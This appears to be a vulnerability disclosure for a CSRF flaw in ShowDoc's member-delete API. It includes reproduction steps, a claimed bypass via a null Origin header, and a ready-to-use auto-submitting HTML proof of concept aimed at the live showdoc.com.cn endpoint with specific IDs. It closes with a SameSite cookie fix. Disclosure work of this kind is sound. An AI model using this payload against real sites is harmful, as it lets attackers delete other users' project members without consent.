With CSRF vulnerability Attacker able to delete any member to of any item if users visit attacker website.
We can bypass the CSRF Protection if we put our payload on a iframe or a html file and send them to victim as after that the Origin header will be set to null
and we can bypass CSRF protection.
1.Open the PoC.html In Firefox or safari.
2.now you can check that member with email address test
that already registered before for item with item_id 1531601670203344
will be deleted.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/delete" method="POST">
<input type="hidden" name="item_id" value="1531601670203344" />
<input type="hidden" name="item_member_id" value="187133" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
This vulnerability is capable of reveal any item.
Set SameSite attribute of cookies to Lax
or Strict
.